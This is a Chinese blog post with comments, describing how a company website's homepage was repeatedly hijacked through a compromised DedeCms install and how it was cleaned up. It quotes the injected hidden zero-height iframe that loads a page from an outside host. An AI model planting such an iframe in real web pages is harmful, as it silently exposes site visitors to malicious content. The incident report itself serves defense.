posts - 128, comments - 376, trackbacks - 5, articles - 37
   :: 首页 :: 新随笔 :: 联系 :: 订阅 订阅 :: 管理

打开公司网站首页,360和杀毒软件就对一个网页进行了劫持,怎么网页受到了病毒侵害呢。通过浏览器查看网页的源代码,发现了一段陌生的代码

<iframe src=http://www.wyf006.cn/one/a9.htm width=50 height=0 border=0></iframe>

 

一看到这段代码,就想起了之前曾经遭遇的Iframe攻击,一种ARP病毒,当时就是由于内网的一台机器感染了ARP病毒,然后不断的进行发包,造成了每台机器在打开网页的时候,都会出现错误,最根本的特征就是在网页中插入这样一条类似的iframe代码,将一个广告网页嵌入进来。当时的解决方案:

      <1>开启ARP保护

      <2>清理一切临时文件,包括IE和系统的,特别是IE,很多缓存的页面可能已经感染了病毒。

      <3>修复系统漏洞,可以用360的系统修复功能

      <4>进行一次全面的杀毒处理,最好寻得专杀工具进行一次全面杀毒

然后我就按着头脑中已定的逻辑去逐步操作,本以为这样就可以解决问题了,但是再处理之后,将那段攻击代码 删除之后,过了没多久又重新被挂马。我也寻得多种木马专杀等工具进行查杀,但是并没有找到问题的根源。

然后我只得到网络上寻得救援。

在不经意间,我发现了,可能与DedeCms有关。一想我的程序应该没有多大问题,而且偏偏攻击的是我的主页,静态页面,而公司网站也有设计部使用DedeCms系统进行管理和维护。

在这个启蒙下,感觉寻得一丝曙光。然后我就让设计部着手去寻得问题的根源

       <1>进入DedeCms管理系统,查看文件,找寻可疑文件。

      果然,在仔细搜寻一番之后,发现很多陌生文件的,有的文件以2008为名,有的以简单aa,bb为名,这些可疑文件的命名很不规范,有的是JS文件,有的是PHP,有的是HTML,看来这就是毒源了。查看里面的代码,发现一般都是乱码。    将这些可疑文件全部删除。  

      <2>看来问题真的出在这里,然后,升级DedeCms,修复系统漏洞

      <3>关闭一些不用的功能,会员功能等。

      <4>将权限进行重新划分,对于一些具有写入权限的目录一定要严格限制。

成长,我们一起见证!

Feedback

#1楼   回复  引用    

2008-10-16 10:19 by ~~~~~~~)(*[未注册用户]
超级不错的文章! 我强烈建议发10条一样的文章到首页!

#2楼   回复  引用    

2008-10-16 10:26 by fsdfset[未注册用户]
还以为你发现漏洞了,汗

#3楼   回复  引用    

2008-10-16 10:27 by 草依山[未注册用户]
你们的服务器没有日志记录吗?
分析一下日志也许能更快找到问题所在

#4楼   回复  引用  查看    

2008-10-16 10:51 by guojing      
--引用--------------------------------------------------
~~~~~~~)(*: 超级不错的文章! 我强烈建议发10条一样的文章到首页!
--------------------------------------------------------
。。。不管怎么说 发在首页确实不太合适

#5楼   回复  引用  查看    

2008-10-16 11:25 by 黑羽飘舞      
小小的预言一下,楼主的网站依旧会受到攻击。

#6楼   回复  引用  查看    

2008-10-16 12:55 by 韩现龙      
网络攻击--利用DedeCms漏洞

#7楼[楼主]   回复  引用  查看    

2008-10-16 13:16 by 停留的风      
@黑羽飘舞
多谢各位支持,的确现在这个问题并没有最终解决,如果DedeCms再曝出漏洞怎么办,本来应用这套系统就是一种危险。现在情况下,我只能通过一些措施,让Dede更安全,如果大家有好的建议,希望大家予以指点。

#8楼   回复  引用    

2008-10-16 15:08 by 马甲[未注册用户]
这个文章简直写的太好了,既有精要的概况让我们迅速的掌握知识的要点,又有详细生动的描述能够让我们了解平时不能了解到的细节,建议网站的首页都设置成这样的好文章.

#9楼   回复  引用  查看    

2008-10-16 15:25 by 太阳      
真的很不错的文章,建议置顶一星期!

#10楼   回复  引用  查看    

2008-10-16 16:26 by Dirain      
赶紧撤了行不?
你怎么不就不想想别人已经拿到你的webshell了,随时改你首页源码。

哎,无语。撤了吧

#11楼   回复  引用  查看    

2008-10-16 16:55 by 真见      
--引用--------------------------------------------------
Dirain: 赶紧撤了行不?
你怎么不就不想想别人已经拿到你的webshell了,随时改你首页源码。

哎,无语。撤了吧
--------------------------------------------------------
说得太对了,webshell必须考虑。

#12楼[楼主]   回复  引用  查看    

2008-10-16 17:45 by 停留的风      
@Dirain,说的非常对,我也考虑到这一点了。我已经采取了一些措施进行了防范,这个Dede得开发一个产品替代。不过这需要一些时间。

#13楼   回复  引用  查看    

2008-10-17 20:40 by Lordz      
--引用--------------------------------------------------
~~~~~~~)(*: 超级不错的文章! 我强烈建议发10条一样的文章到首页!
--------------------------------------------------------
大惊小怪。。。。
发表评论

昵称: [登录] [注册]

主页:

邮箱:(仅博主可见)

评论内容:

  登录  注册

[使用Ctrl+Enter键快速提交评论]

0 1312341




相关文章:

相关链接: